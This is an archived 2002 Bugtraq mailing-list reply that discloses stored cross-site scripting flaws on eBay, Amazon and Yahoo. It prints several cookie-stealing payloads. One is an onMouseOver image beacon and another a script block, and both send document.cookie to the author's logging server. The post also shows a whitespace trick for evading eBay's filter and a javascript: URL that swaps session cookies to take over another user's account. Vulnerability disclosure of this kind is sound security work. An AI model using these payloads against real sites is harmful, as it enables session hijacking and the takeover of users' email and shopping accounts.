Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites
From: Andrew Wason (aw@rootbin.com)Date: 01/22/02
- Previous message: KF: "Re: USPS Online Bill Pay - Cleartext Password Leakage"
- Maybe in reply to: Watung Arif: "Cross-Site Vulnerabilities (Still) Found in Major Web Sites"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 22 Jan 2002 14:10:58 -0000 From: Andrew Wason <aw@rootbin.com> To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is)
In-Reply-To: <EFD4B3AC451FD5118E7400E018C326948275F2@AIRWOLF>
> Yahoo, MSN, AOL, Lycos, and Excite suffer from
such attack.
So do ebay and Amazon. Yahoo will let you post
pretty much any script/html (in invites, auctions etc.).
ebay tries to strip references to document.cookie in
auction postings, but putting whitespace in there fools
it and allows it to be posted, e.g.:
document
.
cookie
Amazon only allows what they call "basic HTML" in
their auction postings, but you can still get script past
their filter e.g.:
<b onMouseOver="new Image
().src='http://demo.rootbin.com:8080/~aw/logger.gif?
cookie=' + escape(document.cookie)">test<b>
When the user mouses over the word test, their
cookies will be logged in my webserves log file.
If a site allows <script> blocks to be posted, you can
log the visitors cookies with no interaction:
<script language="JavaScript">
new Image().src
= "http://demo.rootbin.com:8080/~aw/logger.gif?
cookie=" + escape(document.cookie);
</script>
Yahoo is interesting because they allow script to be
posted in their "Yahoo Invites".
http://invites.yahoo.com/
So you can craft an invitation that logs the users
cookies and have Yahoo email it to the specific
Yahoo users whose accounts you want to access.
I established accounts with each of these (ebay,
Yahoo and Amazon) and was able to collect cookies
on myself and log into that users account by
manually setting those cookies in my browser. Once
you have the cookies (e.g. for amazon), visit
amazon.com and enter this in your browser URL field
(all one line):
javascript:void(document.cookie="session-id-
time=del;expires=Fri, 31 Dec 1999 23:59:59
GMT;domain=amazon.com;");void
(document.cookie="session-id=del;expires=Fri, 31
Dec 1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="ubid-main=del;expires=Fri, 31
Dec 1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="x-main=del;expires=Fri, 31 Dec
1999 23:59:59 GMT;domain=amazon.com;");void
(document.cookie="ubid-main=002-7079596-
1079533;domain=amazon.com;");void
(document.cookie="x-
main=OCoNWc8jtjGE0wvoNWc8jtjGEU0c?
OkW;domain=amazon.com;")
This first deletes your current session cookies and
then replaces them with another users account
information, logging you in (the account info above is
bogus).
On Yahoo, users can choose how long their
accounts stay logged in before asking for a password
again. So if you enter the Yahoo cookies during the
time the user is logged in (within this window) you
have full access to their email, calendar and a lot
more.
I notified Amazon, Yahoo and ebay a while ago - I had
trouble finding out how to notify them. I ended up
using feedback forms on their sites, and a feedback
email alias at amazon.
Amazon responded saying they use SSL so there's
no problem (?). Yahoo responded with a form letter
directing me to various FAQs, I replied and got no
response. ebay did not respond.
Andrew
- Previous message: KF: "Re: USPS Online Bill Pay - Cleartext Password Leakage"
- Maybe in reply to: Watung Arif: "Cross-Site Vulnerabilities (Still) Found in Major Web Sites"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
